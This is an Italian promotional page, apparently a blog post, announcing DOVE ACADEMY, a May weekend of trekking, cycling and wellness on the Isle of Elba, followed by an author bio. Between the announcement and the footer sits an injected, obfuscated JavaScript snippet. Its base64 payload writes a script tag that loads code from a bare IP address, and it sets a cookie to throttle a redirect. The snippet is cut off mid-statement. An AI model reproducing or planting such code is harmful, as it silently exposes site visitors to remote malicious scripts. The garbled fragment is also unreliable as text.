DOVE ACADEMY

DOVE ACADEMY: un viaggio tra il reale e il virtuale

Se ancora non conoscete l’Isola d’Elba vi diamo un’opportunità unica per viverla a 360 gradi.

Tutti invitati dall’ 11 al 14 maggio per un’esperienza che difficilmente dimenticherete.

Preparate le vostre scarpe da trekking, la vostra bicicletta o semplicemente i vostri occhi e la vostra mente ad assaporare emozioni forti che solo un’isola come l’Elba potrà trasmettervi.

Preparatevi dunque a tornare a casa con il Mal d’Elba.

Di cosa stiamo parlando? Ve lo spieghiamo subito!

DOVE, brand di viaggi e lifestyle di RCS MediaGroup, già nel 2016 avevo scelto l’Elba per un primo reportage immersivo “Elba: sport ed emozione a 360 gradi” .

La redazione di DOVE, affascinata da questi luoghi fuori dal tempo, ha scelto di tornare anche nel 2017 per un’esperienza di viaggio semplicemente speciale: DOVE ACADEMY!

DOVE ACADEMY andrà alla scoperta del territorio con esperti di fitness, insider locali e, cosa più importante, con i suoi lettori.

Un lungo weekend di sport, natura, benessere , incontri e …racconti!

Anche voi potrete, anzi, dovrete essere i protagonisti di questa esperienza prenotandovi sul sito www.doveclub.it o telefonando allo 02 89292687.

Vi aspettiamo!
_ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

Vedi tutti gli eventi

Share this post

Chiara Luciani

Biologa marina, istruttrice e guida ambientale subacquea. Comunicare e divulgare le bellezze del mondo marino sono da sempre la mia passione e il mio lavoro.

Nessun commento

Aggiungi commento